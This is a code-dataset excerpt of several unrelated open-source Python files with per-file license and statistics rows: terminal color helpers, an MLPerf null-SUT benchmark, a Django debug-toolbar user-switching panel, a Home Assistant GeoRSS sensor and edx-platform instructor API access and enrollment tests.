s += ', independent_linears={independent_linears}'
if self.share_memory != True:
s += ', share_memory={share_memory}'
if self.debug != False:
s += ', debug={debug}'
if self.clip != 20:
s += ', clip={clip}'
s += ")\n" + super(DNC, self).__repr__() + \
"\n----------------------------------------\n"
return s.format(name=self.__class__.__name__, **self.__dict__)
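# Usage sketch (illustrative; sizes arbitrary, CPU mode with gpu_id=-1):
#
#   rnn = DNC(input_size=64, hidden_size=128, rnn_type='lstm', num_layers=4,
#             nr_cells=100, cell_size=32, read_heads=4, batch_first=True,
#             gpu_id=-1)
#   (controller_hidden, memory, read_vectors) = (None, None, None)
#   output, (controller_hidden, memory, read_vectors) = \
#       rnn(T.randn(10, 4, 64), (controller_hidden, memory, read_vectors),
#           reset_experience=True)
#   # output: (10, 4, 64); the returned hidden tuple can seed the next call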
| mit | 3,054,484,300,671,407,000 | 32.377358 | 155 | 0.595534 | false | 3.356736 | false | false | false |
ukncsc/viper | viper/common/colors.py | 9 | 1468 | # This file is part of Viper - https://github.com/viper-framework/viper
# See the file 'LICENSE' for copying permission.
import os
import sys
def color(text, color_code, readline=False):
"""Colorize text.
@param text: text.
@param color_code: color.
@return: colorized text.
"""
# $TERM under Windows:
# cmd.exe -> "" (what would you expect..?)
# cygwin -> "cygwin" (should support colors, but doesn't work somehow)
# mintty -> "xterm" (supports colors)
if sys.platform == "win32" and os.getenv("TERM") != "xterm":
return str(text)
if readline:
# special readline escapes to fix colored input promps
# http://bugs.python.org/issue17337
return "\x01\x1b[%dm\x02%s\x01\x1b[0m\x02" % (color_code, text)
return "\x1b[%dm%s\x1b[0m" % (color_code, text)
def black(text, readline=False):
return color(text, 30, readline)
def red(text, readline=False):
return color(text, 31, readline)
def green(text, readline=False):
return color(text, 32, readline)
def yellow(text, readline=False):
return color(text, 33, readline)
def blue(text, readline=False):
return color(text, 34, readline)
def magenta(text, readline=False):
return color(text, 35, readline)
def cyan(text, readline=False):
return color(text, 36, readline)
def white(text, readline=False):
return color(text, 37, readline)
def bold(text, readline=False):
return color(text, 1, readline)
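# Example (illustrative): the helpers compose, so styles can be nested.
#   print(bold(red('[!]')) + ' ' + yellow('suspicious sample detected'))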
| bsd-3-clause | -7,534,164,176,107,016,000 | 27.230769 | 74 | 0.662807 | false | 3.254989 | false | false | false |
mlperf/inference_results_v0.5 | closed/Google/code/resnet/tpu-resnet/third_party/mlperf/inference/loadgen/tests/perftests_null_sut.py | 5 | 2058 | # Copyright 2019 The MLPerf Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Python version of perftests_null_sut.cc.
"""
from __future__ import print_function
from absl import app
import mlperf_loadgen
import numpy
def load_samples_to_ram(query_samples):
del query_samples
return
def unload_samples_from_ram(query_samples):
del query_samples
return
def issue_query(query_samples):
responses = []
for s in query_samples:
responses.append(mlperf_loadgen.QuerySampleResponse(s.id, 0, 0))
mlperf_loadgen.QuerySamplesComplete(responses)
def flush_queries():
pass
def process_latencies(latencies_ns):
print("Average latency: ")
print(numpy.mean(latencies_ns))
print("Median latency: ")
print(numpy.percentile(latencies_ns, 50))
print("90 percentile latency: ")
print(numpy.percentile(latencies_ns, 90))
def main(argv):
del argv
settings = mlperf_loadgen.TestSettings()
settings.scenario = mlperf_loadgen.TestScenario.SingleStream
settings.mode = mlperf_loadgen.TestMode.PerformanceOnly
sut = mlperf_loadgen.ConstructSUT(
issue_query, flush_queries, process_latencies)
qsl = mlperf_loadgen.ConstructQSL(
1024 * 1024, 1024, load_samples_to_ram, unload_samples_from_ram)
mlperf_loadgen.StartTest(sut, qsl, settings)
mlperf_loadgen.DestroyQSL(qsl)
mlperf_loadgen.DestroySUT(sut)
if __name__ == "__main__":
app.run(main)
| apache-2.0 | 2,030,145,179,946,737,400 | 27.985915 | 79 | 0.693878 | false | 3.616872 | false | false | false |
lamby/django-debug-toolbar-user-panel | debug_toolbar_user_panel/panels.py | 1 | 3985 | """
:mod:`django-debug-toolbar-user-panel`
======================================
Panel for the `Django Debug Toolbar <https://github.com/django-debug-toolbar/django-debug-toolbar>`_
to easily and quickly switch between users.
* View details on the currently logged in user.
* Login as any user from an arbitrary email address, username or user ID.
* Easily switch between recently logged in users.
.. figure:: screenshot.png
:align: center
The panel supports ``django.contrib.auth.models.User`` models that have had
the `username` field removed.
Installation
------------
Add ``debug_toolbar_user_panel`` to your ``INSTALLED_APPS``::
INSTALLED_APPS = (
...
'debug_toolbar_user_panel',
...
)
Add ``debug_toolbar_user_panel.panels.UserPanel`` to ``DEBUG_TOOLBAR_PANELS``::
DEBUG_TOOLBAR_PANELS = (
'debug_toolbar_user_panel.panels.UserPanel'
'debug_toolbar.panels.version.VersionDebugPanel',
'debug_toolbar.panels.timer.TimerDebugPanel',
'debug_toolbar.panels.settings_vars.SettingsVarsDebugPanel',
'debug_toolbar.panels.headers.HeaderDebugPanel',
'debug_toolbar.panels.request_vars.RequestVarsDebugPanel',
'debug_toolbar.panels.sql.SQLDebugPanel',
'debug_toolbar.panels.template.TemplateDebugPanel',
'debug_toolbar.panels.signals.SignalDebugPanel',
'debug_toolbar.panels.logger.LoggingPanel',
)
Links
-----
View/download code
https://github.com/playfire/django-debug-toolbar-user-panel
File a bug
https://github.com/playfire/django-debug-toolbar-user-panel/issues
"""
from django import VERSION
from django.conf import settings
from django.http import HttpResponseForbidden
from django.conf.urls import url
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth import get_user_model
from debug_toolbar.panels import DebugPanel
from . import views
from .forms import UserForm
class UserPanel(DebugPanel):
"""
Panel that allows you to login as other recently-logged in users.
"""
name = 'User'
has_content = True
@property
def nav_title(self):
return _('User')
@property
def url(self):
return ''
@property
def title(self):
return _('User')
@property
def nav_subtitle(self):
return self.is_authenticated(self.request) and self.request.user
template = 'debug_toolbar_user_panel/panel.html'
@property
def content(self):
if not getattr(settings, 'DEBUG_TOOLBAR_USER_DEBUG', settings.DEBUG):
return HttpResponseForbidden()
current = []
if self.is_authenticated(self.request):
for field in get_user_model()._meta.fields:
if field.name == 'password':
continue
current.append(
(field.attname, getattr(self.request.user, field.attname))
)
return render_to_string(self.template, {
'user': self.request.user,
'form': UserForm(),
'next': self.request.GET.get('next'),
'users': get_user_model().objects.order_by('-last_login')[:10],
'current': current,
})
def is_authenticated(self, request):
if VERSION >= (1, 10):
# Django 1.10 onwards `is_authenticated` is a property
return request.user.is_authenticated
return request.user.is_authenticated()
def process_response(self, request, response):
self.request = request
@classmethod
def get_urls(cls):
return (
url(r'^users/login/$', views.login_form,
name='debug-userpanel-login-form'),
url(r'^users/login/(?P<pk>-?\d+)$', views.login,
name='debug-userpanel-login'),
url(r'^users/logout$', views.logout,
name='debug-userpanel-logout'),
)
| bsd-3-clause | 3,879,896,755,053,177,300 | 28.518519 | 100 | 0.633626 | false | 3.985 | false | false | false |
HydrelioxGitHub/home-assistant | homeassistant/components/sensor/geo_rss_events.py | 4 | 5423 | """
Generic GeoRSS events service.
Retrieves current events (typically incidents or alerts) in GeoRSS format, and
shows information on events filtered by distance to the HA instance's location
and grouped by category.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.geo_rss_events/
"""
import logging
from datetime import timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_UNIT_OF_MEASUREMENT, CONF_NAME,
CONF_LATITUDE, CONF_LONGITUDE, CONF_RADIUS, CONF_URL)
from homeassistant.helpers.entity import Entity
REQUIREMENTS = ['georss_client==0.5']
_LOGGER = logging.getLogger(__name__)
ATTR_CATEGORY = 'category'
ATTR_DISTANCE = 'distance'
ATTR_TITLE = 'title'
CONF_CATEGORIES = 'categories'
DEFAULT_ICON = 'mdi:alert'
DEFAULT_NAME = "Event Service"
DEFAULT_RADIUS_IN_KM = 20.0
DEFAULT_UNIT_OF_MEASUREMENT = 'Events'
DOMAIN = 'geo_rss_events'
SCAN_INTERVAL = timedelta(minutes=5)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_URL): cv.string,
vol.Optional(CONF_LATITUDE): cv.latitude,
vol.Optional(CONF_LONGITUDE): cv.longitude,
vol.Optional(CONF_RADIUS, default=DEFAULT_RADIUS_IN_KM): vol.Coerce(float),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_CATEGORIES, default=[]):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_UNIT_OF_MEASUREMENT,
default=DEFAULT_UNIT_OF_MEASUREMENT): cv.string,
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the GeoRSS component."""
latitude = config.get(CONF_LATITUDE, hass.config.latitude)
longitude = config.get(CONF_LONGITUDE, hass.config.longitude)
url = config.get(CONF_URL)
radius_in_km = config.get(CONF_RADIUS)
name = config.get(CONF_NAME)
categories = config.get(CONF_CATEGORIES)
unit_of_measurement = config.get(CONF_UNIT_OF_MEASUREMENT)
_LOGGER.debug("latitude=%s, longitude=%s, url=%s, radius=%s",
latitude, longitude, url, radius_in_km)
# Create all sensors based on categories.
devices = []
if not categories:
device = GeoRssServiceSensor((latitude, longitude), url,
radius_in_km, None, name,
unit_of_measurement)
devices.append(device)
else:
for category in categories:
device = GeoRssServiceSensor((latitude, longitude), url,
radius_in_km, category, name,
unit_of_measurement)
devices.append(device)
add_entities(devices, True)
class GeoRssServiceSensor(Entity):
"""Representation of a Sensor."""
def __init__(self, coordinates, url, radius, category, service_name,
unit_of_measurement):
"""Initialize the sensor."""
self._category = category
self._service_name = service_name
self._state = None
self._state_attributes = None
self._unit_of_measurement = unit_of_measurement
from georss_client.generic_feed import GenericFeed
self._feed = GenericFeed(coordinates, url, filter_radius=radius,
filter_categories=None if not category
else [category])
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(self._service_name,
'Any' if self._category is None
else self._category)
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return self._unit_of_measurement
@property
def icon(self):
"""Return the default icon to use in the frontend."""
return DEFAULT_ICON
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._state_attributes
def update(self):
"""Update this sensor from the GeoRSS service."""
import georss_client
status, feed_entries = self._feed.update()
if status == georss_client.UPDATE_OK:
_LOGGER.debug("Adding events to sensor %s: %s", self.entity_id,
feed_entries)
self._state = len(feed_entries)
# And now compute the attributes from the filtered events.
matrix = {}
for entry in feed_entries:
matrix[entry.title] = '{:.0f}km'.format(
entry.distance_to_home)
self._state_attributes = matrix
elif status == georss_client.UPDATE_OK_NO_DATA:
_LOGGER.debug("Update successful, but no data received from %s",
self._feed)
# Don't change the state or state attributes.
else:
_LOGGER.warning("Update not successful, no data received from %s",
self._feed)
# If no events were found due to an error then just set state to
# zero.
self._state = 0
self._state_attributes = {}
| apache-2.0 | 2,592,984,052,436,335,000 | 34.913907 | 79 | 0.618108 | false | 4.165131 | true | false | false |
EDUlib/edx-platform | lms/djangoapps/instructor/tests/test_api.py | 1 | 190051 | """
Unit tests for instructor.api methods.
"""
import datetime
import functools
import io
import json
import random
import shutil
import tempfile
from unittest.mock import Mock, NonCallableMock, patch
import ddt
import pytest
import six
from boto.exception import BotoServerError
from django.conf import settings
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.core import mail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.http import HttpRequest, HttpResponse
from django.test import RequestFactory, TestCase
from django.urls import reverse as django_reverse
from django.utils.translation import ugettext as _
from edx_when.api import get_dates_for_course, get_overrides_for_user, set_date_for_block
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locator import UsageKey
from pytz import UTC
from testfixtures import LogCapture
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.course_modes.tests.factories import CourseModeFactory
from common.djangoapps.student.models import (
ALLOWEDTOENROLL_TO_ENROLLED,
ALLOWEDTOENROLL_TO_UNENROLLED,
ENROLLED_TO_ENROLLED,
ENROLLED_TO_UNENROLLED,
UNENROLLED_TO_ALLOWEDTOENROLL,
UNENROLLED_TO_ENROLLED,
UNENROLLED_TO_UNENROLLED,
CourseEnrollment,
CourseEnrollmentAllowed,
ManualEnrollmentAudit,
NonExistentCourseError,
get_retired_email_by_email,
get_retired_username_by_username
)
from common.djangoapps.student.roles import (
CourseBetaTesterRole,
CourseDataResearcherRole,
CourseFinanceAdminRole,
CourseInstructorRole,
)
from common.djangoapps.student.tests.factories import CourseEnrollmentFactory, UserFactory # lint-amnesty, pylint: disable=unused-import
from lms.djangoapps.bulk_email.models import BulkEmailFlag, CourseEmail, CourseEmailTemplate
from lms.djangoapps.certificates.api import generate_user_certificates
from lms.djangoapps.certificates.models import CertificateStatuses
from lms.djangoapps.certificates.tests.factories import (
GeneratedCertificateFactory
)
from lms.djangoapps.courseware.models import StudentModule
from lms.djangoapps.courseware.tests.factories import (
BetaTesterFactory,
GlobalStaffFactory,
InstructorFactory,
StaffFactory,
)
from lms.djangoapps.courseware.tests.helpers import LoginEnrollmentTestCase
from lms.djangoapps.experiments.testutils import override_experiment_waffle_flag
from lms.djangoapps.instructor.tests.utils import FakeContentTask, FakeEmail, FakeEmailInfo
from lms.djangoapps.instructor.views.api import (
_get_certificate_for_user,
_get_student_from_request_data,
_split_input_list,
common_exceptions_400,
generate_unique_password,
require_finance_admin
)
from lms.djangoapps.instructor_task.api_helper import (
AlreadyRunningError,
QueueConnectionError,
generate_already_running_error_message
)
from lms.djangoapps.program_enrollments.tests.factories import ProgramEnrollmentFactory
from openedx.core.djangoapps.course_date_signals.handlers import extract_dates
from openedx.core.djangoapps.course_groups.cohorts import set_course_cohorted
from openedx.core.djangoapps.django_comment_common.models import FORUM_ROLE_COMMUNITY_TA
from openedx.core.djangoapps.django_comment_common.utils import seed_permissions_roles
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.site_configuration.tests.mixins import SiteMixin
from openedx.core.lib.teams_config import TeamsConfig
from openedx.core.lib.xblock_utils import grade_histogram
from openedx.features.course_experience import RELATIVE_DATES_FLAG
from xmodule.fields import Date
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase, SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from .test_tools import msk_from_problem_urlname
DATE_FIELD = Date()
EXPECTED_CSV_HEADER = (
'"code","redeem_code_url","course_id","company_name","created_by","redeemed_by","invoice_id","purchaser",'
'"customer_reference_number","internal_reference"'
)
# ddt data for test cases involving reports
REPORTS_DATA = (
{
'report_type': 'grade',
'instructor_api_endpoint': 'calculate_grades_csv',
'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_grades_csv',
'extra_instructor_api_kwargs': {}
},
{
'report_type': 'enrolled learner profile',
'instructor_api_endpoint': 'get_students_features',
'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_students_features_csv',
'extra_instructor_api_kwargs': {'csv': '/csv'}
},
{
'report_type': 'enrollment',
'instructor_api_endpoint': 'get_students_who_may_enroll',
'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_may_enroll_csv',
'extra_instructor_api_kwargs': {},
},
{
'report_type': 'proctored exam results',
'instructor_api_endpoint': 'get_proctored_exam_results',
'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_proctored_exam_results_report',
'extra_instructor_api_kwargs': {},
},
{
'report_type': 'problem responses',
'instructor_api_endpoint': 'get_problem_responses',
'task_api_endpoint': 'lms.djangoapps.instructor_task.api.submit_calculate_problem_responses_csv',
'extra_instructor_api_kwargs': {},
}
)
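# Each REPORTS_DATA entry parameterizes one report test: 'instructor_api_endpoint'
# names the dashboard view under test and 'task_api_endpoint' names the
# instructor_task API function that view is expected to submit.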
INSTRUCTOR_GET_ENDPOINTS = {
'get_anon_ids',
'get_issued_certificates',
}
INSTRUCTOR_POST_ENDPOINTS = {
'add_users_to_cohorts',
'bulk_beta_modify_access',
'calculate_grades_csv',
'change_due_date',
'export_ora2_data',
'export_ora2_submission_files',
'export_ora2_summary',
'get_grading_config',
'get_problem_responses',
'get_proctored_exam_results',
'get_student_enrollment_status',
'get_student_progress_url',
'get_students_features',
'get_students_who_may_enroll',
'list_background_email_tasks',
'list_course_role_members',
'list_email_content',
'list_entrance_exam_instructor_tasks',
'list_forum_members',
'list_instructor_tasks',
'list_report_downloads',
'mark_student_can_skip_entrance_exam',
'modify_access',
'register_and_enroll_students',
'rescore_entrance_exam',
'rescore_problem',
'reset_due_date',
'reset_student_attempts',
'reset_student_attempts_for_entrance_exam',
'show_student_extensions',
'show_unit_extensions',
'send_email',
'students_update_enrollment',
'update_forum_role_membership',
'override_problem_score',
}
def reverse(endpoint, args=None, kwargs=None, is_dashboard_endpoint=True):
"""
Simple wrapper of Django's reverse that first ensures that we have declared
each endpoint under test.
Arguments:
args: The args to be passed through to reverse.
endpoint: The endpoint to be passed through to reverse.
kwargs: The kwargs to be passed through to reverse.
is_dashboard_endpoint: True if this is an instructor dashboard endpoint
that must be declared in the INSTRUCTOR_GET_ENDPOINTS or
INSTRUCTOR_POST_ENDPOINTS sets, or False otherwise.
Returns:
The return of Django's reverse function
"""
is_endpoint_declared = endpoint in INSTRUCTOR_GET_ENDPOINTS or endpoint in INSTRUCTOR_POST_ENDPOINTS
if is_dashboard_endpoint and is_endpoint_declared is False:
# Verify that all endpoints are declared so we can ensure they are
# properly validated elsewhere.
raise ValueError(f"The endpoint {endpoint} must be declared in ENDPOINTS before use.")
return django_reverse(endpoint, args=args, kwargs=kwargs)
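# Illustrative usage only: reverse('get_anon_ids', kwargs={'course_id': course_id})
# resolves normally because that endpoint is declared above, while reversing an
# undeclared dashboard endpoint raises the ValueError from this wrapper.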
@common_exceptions_400
def view_success(request):
"A dummy view for testing that returns a simple HTTP response"
return HttpResponse('success')
@common_exceptions_400
def view_user_doesnotexist(request):
"A dummy view that raises a User.DoesNotExist exception"
raise User.DoesNotExist()
@common_exceptions_400
def view_alreadyrunningerror(request):
"A dummy view that raises an AlreadyRunningError exception"
raise AlreadyRunningError()
@common_exceptions_400
def view_alreadyrunningerror_unicode(request):
"""
A dummy view that raises an AlreadyRunningError exception with unicode message
"""
raise AlreadyRunningError('Text with unicode chárácters')
@common_exceptions_400
def view_queue_connection_error(request):
"""
A dummy view that raises a QueueConnectionError exception.
"""
raise QueueConnectionError()
@ddt.ddt
class TestCommonExceptions400(TestCase):
"""
Testing the common_exceptions_400 decorator.
"""
def setUp(self):
super().setUp()
self.request = Mock(spec=HttpRequest)
self.request.META = {}
def test_happy_path(self):
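"""
Tests that a view raising no exception passes through with a 200 response.
"""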
resp = view_success(self.request)
assert resp.status_code == 200
def test_user_doesnotexist(self):
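"""
Tests that User.DoesNotExist is converted into a 400 response.
"""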
self.request.is_ajax.return_value = False
resp = view_user_doesnotexist(self.request)
self.assertContains(resp, "User does not exist", status_code=400)
def test_user_doesnotexist_ajax(self):
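"""
Tests that User.DoesNotExist is converted into a 400 response for AJAX requests.
"""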
self.request.is_ajax.return_value = True
resp = view_user_doesnotexist(self.request)
self.assertContains(resp, "User does not exist", status_code=400)
@ddt.data(True, False)
def test_alreadyrunningerror(self, is_ajax):
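"""
Tests that AlreadyRunningError is handled in common_exceptions_400.
"""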
self.request.is_ajax.return_value = is_ajax
resp = view_alreadyrunningerror(self.request)
self.assertContains(resp, "Requested task is already running", status_code=400)
@ddt.data(True, False)
def test_alreadyrunningerror_with_unicode(self, is_ajax):
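"""
Tests that AlreadyRunningError messages containing unicode are handled.
"""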
self.request.is_ajax.return_value = is_ajax
resp = view_alreadyrunningerror_unicode(self.request)
self.assertContains(
resp,
'Text with unicode chárácters',
status_code=400,
)
@ddt.data(True, False)
def test_queue_connection_error(self, is_ajax):
"""
Tests that QueueConnectionError exception is handled in common_exception_400.
"""
self.request.is_ajax.return_value = is_ajax
resp = view_queue_connection_error(self.request)
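# The expected text below (spelling included) must match the message that
# common_exceptions_400 produces for QueueConnectionError.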
self.assertContains(
resp,
'Error occured. Please try again later',
status_code=400,
)
@ddt.ddt
class TestEndpointHttpMethods(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Ensure that users can make GET requests against endpoints that allow GET,
and not against those that don't allow GET.
"""
@classmethod
def setUpClass(cls):
"""
Set up test course.
"""
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
"""
Set up global staff role so authorization will not fail.
"""
super().setUp()
global_user = GlobalStaffFactory()
self.client.login(username=global_user.username, password='test')
@ddt.data(*INSTRUCTOR_POST_ENDPOINTS)
def test_endpoints_reject_get(self, data):
"""
Tests that POST endpoints are rejected with 405 when using GET.
"""
url = reverse(data, kwargs={'course_id': str(self.course.id)})
response = self.client.get(url)
assert response.status_code == 405, \
f'Endpoint {data} returned status code {response.status_code} instead of a 405. It should not allow GET.'
@ddt.data(*INSTRUCTOR_GET_ENDPOINTS)
def test_endpoints_accept_get(self, data):
"""
Tests that GET endpoints are not rejected with 405 when using GET.
"""
url = reverse(data, kwargs={'course_id': str(self.course.id)})
response = self.client.get(url)
assert response.status_code != 405, \
f"Endpoint {data} returned status code 405 where it shouldn't, since it should allow GET."
@patch('lms.djangoapps.bulk_email.models.html_to_text', Mock(return_value='Mocking CourseEmail.text_message', autospec=True)) # lint-amnesty, pylint: disable=line-too-long
class TestInstructorAPIDenyLevels(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Ensure that users cannot access endpoints they shouldn't be able to.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
cls.chapter = ItemFactory.create(
parent=cls.course,
category='chapter',
display_name="Chapter",
publish_item=True,
start=datetime.datetime(2018, 3, 10, tzinfo=UTC),
)
cls.sequential = ItemFactory.create(
parent=cls.chapter,
category='sequential',
display_name="Lesson",
publish_item=True,
start=datetime.datetime(2018, 3, 10, tzinfo=UTC),
metadata={'graded': True, 'format': 'Homework'},
)
cls.vertical = ItemFactory.create(
parent=cls.sequential,
category='vertical',
display_name='Subsection',
publish_item=True,
start=datetime.datetime(2018, 3, 10, tzinfo=UTC),
)
cls.problem = ItemFactory.create(
category="problem",
parent=cls.vertical,
display_name="A Problem Block",
weight=1,
publish_item=True,
)
cls.problem_urlname = str(cls.problem.location)
BulkEmailFlag.objects.create(enabled=True, require_course_email_auth=False)
@classmethod
def tearDownClass(cls):
super().tearDownClass()
BulkEmailFlag.objects.all().delete()
def setUp(self):
super().setUp()
self.user = UserFactory.create()
CourseEnrollment.enroll(self.user, self.course.id)
_module = StudentModule.objects.create(
student=self.user,
course_id=self.course.id,
module_state_key=self.problem.location,
state=json.dumps({'attempts': 10}),
)
# Endpoints that only Staff or Instructors can access
self.staff_level_endpoints = [
('students_update_enrollment',
{'identifiers': 'foo@example.org', 'action': 'enroll'}),
('get_grading_config', {}),
('get_students_features', {}),
('get_student_progress_url', {'unique_student_identifier': self.user.username}),
('update_forum_role_membership',
{'unique_student_identifier': self.user.email, 'rolename': 'Moderator', 'action': 'allow'}),
('list_forum_members', {'rolename': FORUM_ROLE_COMMUNITY_TA}),
('send_email', {'send_to': '["staff"]', 'subject': 'test', 'message': 'asdf'}),
('list_instructor_tasks', {}),
('list_background_email_tasks', {}),
('list_report_downloads', {}),
('calculate_grades_csv', {}),
('get_students_features', {}),
('get_students_who_may_enroll', {}),
('get_proctored_exam_results', {}),
('get_problem_responses', {}),
('export_ora2_data', {}),
('export_ora2_submission_files', {}),
('export_ora2_summary', {}),
('rescore_problem',
{'problem_to_reset': self.problem_urlname, 'unique_student_identifier': self.user.email}),
('override_problem_score',
{'problem_to_reset': self.problem_urlname, 'unique_student_identifier': self.user.email, 'score': 0}),
('reset_student_attempts',
{'problem_to_reset': self.problem_urlname, 'unique_student_identifier': self.user.email}),
(
'reset_student_attempts',
{
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.user.email,
'delete_module': True
}
),
]
# Endpoints that only Instructors can access
self.instructor_level_endpoints = [
('bulk_beta_modify_access', {'identifiers': 'foo@example.org', 'action': 'add'}),
('modify_access', {'unique_student_identifier': self.user.email, 'rolename': 'beta', 'action': 'allow'}),
('list_course_role_members', {'rolename': 'beta'}),
('rescore_problem', {'problem_to_reset': self.problem_urlname, 'all_students': True}),
('reset_student_attempts', {'problem_to_reset': self.problem_urlname, 'all_students': True}),
]
def _access_endpoint(self, endpoint, args, status_code, msg):
"""
Asserts that accessing the given `endpoint` gets a response of `status_code`.
endpoint: string, endpoint for instructor dash API
args: dict, kwargs for `reverse` call
status_code: expected HTTP status code response
msg: message to display if assertion fails.
"""
url = reverse(endpoint, kwargs={'course_id': str(self.course.id)})
if endpoint in INSTRUCTOR_GET_ENDPOINTS:
response = self.client.get(url, args)
else:
response = self.client.post(url, args)
assert response.status_code == status_code, msg
def test_student_level(self):
"""
Ensure that an enrolled student can't access staff or instructor endpoints.
"""
self.client.login(username=self.user.username, password='test')
for endpoint, args in self.staff_level_endpoints:
self._access_endpoint(
endpoint,
args,
403,
"Student should not be allowed to access endpoint " + endpoint
)
for endpoint, args in self.instructor_level_endpoints:
self._access_endpoint(
endpoint,
args,
403,
"Student should not be allowed to access endpoint " + endpoint
)
def _access_problem_responses_endpoint(self, msg):
"""
Access endpoint for problem responses report, ensuring that
UsageKey.from_string returns a problem key that the endpoint
can work with.
msg: message to display if assertion fails.
"""
mock_problem_key = NonCallableMock(return_value='')
mock_problem_key.course_key = self.course.id
with patch.object(UsageKey, 'from_string') as patched_method:
patched_method.return_value = mock_problem_key
self._access_endpoint('get_problem_responses', {}, 200, msg)
def test_staff_level(self):
"""
Ensure that a staff member can't access instructor endpoints.
"""
staff_member = StaffFactory(course_key=self.course.id)
CourseEnrollment.enroll(staff_member, self.course.id)
CourseFinanceAdminRole(self.course.id).add_users(staff_member)
CourseDataResearcherRole(self.course.id).add_users(staff_member)
self.client.login(username=staff_member.username, password='test')
# Try to promote to forums admin - not working
# update_forum_role(self.course.id, staff_member, FORUM_ROLE_ADMINISTRATOR, 'allow')
for endpoint, args in self.staff_level_endpoints:
expected_status = 200
# TODO: make these work
if endpoint in ['update_forum_role_membership', 'list_forum_members']:
continue
elif endpoint == 'get_problem_responses':
self._access_problem_responses_endpoint(
"Staff member should be allowed to access endpoint " + endpoint
)
continue
self._access_endpoint(
endpoint,
args,
expected_status,
"Staff member should be allowed to access endpoint " + endpoint
)
for endpoint, args in self.instructor_level_endpoints:
self._access_endpoint(
endpoint,
args,
403,
"Staff member should not be allowed to access endpoint " + endpoint
)
def test_instructor_level(self):
"""
Ensure that an instructor member can access all endpoints.
"""
inst = InstructorFactory(course_key=self.course.id)
CourseEnrollment.enroll(inst, self.course.id)
CourseFinanceAdminRole(self.course.id).add_users(inst)
CourseDataResearcherRole(self.course.id).add_users(inst)
self.client.login(username=inst.username, password='test')
for endpoint, args in self.staff_level_endpoints:
expected_status = 200
# TODO: make these work
if endpoint in ['update_forum_role_membership']:
continue
elif endpoint == 'get_problem_responses':
self._access_problem_responses_endpoint(
"Instructor should be allowed to access endpoint " + endpoint
)
continue
self._access_endpoint(
endpoint,
args,
expected_status,
"Instructor should be allowed to access endpoint " + endpoint
)
for endpoint, args in self.instructor_level_endpoints:
expected_status = 200
self._access_endpoint(
endpoint,
args,
expected_status,
"Instructor should be allowed to access endpoint " + endpoint
)
@patch.dict(settings.FEATURES, {'ALLOW_AUTOMATED_SIGNUPS': True})
class TestInstructorAPIBulkAccountCreationAndEnrollment(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test bulk account creation and enrollment from a CSV file.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
# Create a course with mode 'audit'
cls.audit_course = CourseFactory.create()
CourseModeFactory.create(course_id=cls.audit_course.id, mode_slug=CourseMode.AUDIT)
cls.url = reverse(
'register_and_enroll_students', kwargs={'course_id': str(cls.course.id)}
)
cls.audit_course_url = reverse(
'register_and_enroll_students', kwargs={'course_id': str(cls.audit_course.id)}
)
def setUp(self):
super().setUp()
# Create a course with mode 'honor' and with price
self.white_label_course = CourseFactory.create()
self.white_label_course_mode = CourseModeFactory.create(
course_id=self.white_label_course.id,
mode_slug=CourseMode.HONOR,
min_price=10,
suggested_prices='10',
)
self.white_label_course_url = reverse(
'register_and_enroll_students', kwargs={'course_id': str(self.white_label_course.id)}
)
self.request = RequestFactory().request()
self.instructor = InstructorFactory(course_key=self.course.id)
self.audit_course_instructor = InstructorFactory(course_key=self.audit_course.id)
self.white_label_course_instructor = InstructorFactory(course_key=self.white_label_course.id)
self.client.login(username=self.instructor.username, password='test')
self.not_enrolled_student = UserFactory(
username='NotEnrolledStudent',
email='nonenrolled@test.com',
first_name='NotEnrolled',
last_name='Student'
)
@patch('lms.djangoapps.instructor.views.api.log.info')
def test_account_creation_and_enrollment_with_csv(self, info_log):
"""
Happy path test to create a single new user
"""
csv_content = b"test_student@example.com,test_student_1,tester1,USA"
uploaded_file = SimpleUploadedFile("temp.csv", csv_content)
response = self.client.post(self.url, {'students_list': uploaded_file})
assert response.status_code == 200
data = json.loads(response.content.decode('utf-8'))
assert len(data['row_errors']) == 0
assert len(data['warnings']) == 0
assert len(data['general_errors']) == 0
manual_enrollments = ManualEnrollmentAudit.objects.all()
assert manual_enrollments.count() == 1
